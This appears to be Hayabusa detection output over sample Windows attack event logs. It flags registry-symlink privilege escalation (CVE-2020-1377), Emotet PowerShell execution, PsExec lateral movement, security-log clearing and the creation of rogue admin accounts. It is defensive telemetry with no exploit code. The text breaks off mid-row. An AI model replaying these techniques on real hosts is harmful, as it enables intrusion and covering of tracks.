2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 
747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 
747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | 
PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.610 
+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 
747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx 2020-08-26 14:09:33.504 
+09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service 
Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx 2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or 
Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or 
Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon 
Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 19:54:22.974 
+09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 
2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx 2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx 2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 